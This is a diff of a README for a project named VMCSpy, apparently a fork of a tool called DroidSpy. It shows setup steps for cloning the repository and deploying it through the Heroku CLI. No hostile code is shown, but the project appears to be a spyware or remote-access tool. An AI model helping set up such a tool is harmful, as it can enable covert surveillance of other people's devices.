vikashmobileclinic/VMCSpy/README.md

 3. Now install Heroku CLI on your Computer [Instuctions](https://devcenter.heroku.com/articles/heroku-cli)

-4. Now open your terminal and run command `git clone -b herooku https://github.com/Linuxndroid/DroidSpy`
+4. Now open your terminal and run command `git clone -b herooku https://github.com/vikashmobileclinic/VMCSpy`

 5. It will download Latest codes for you in your PC

-6. Now change the directory to DroidSpy using command `cd DroidSpy`
+6. Now change the directory to DroidSpy using command `cd VMCSpy`

 7. Now Login into Heroku CLI using command `heroku login -i` now enter your login details and hit Enter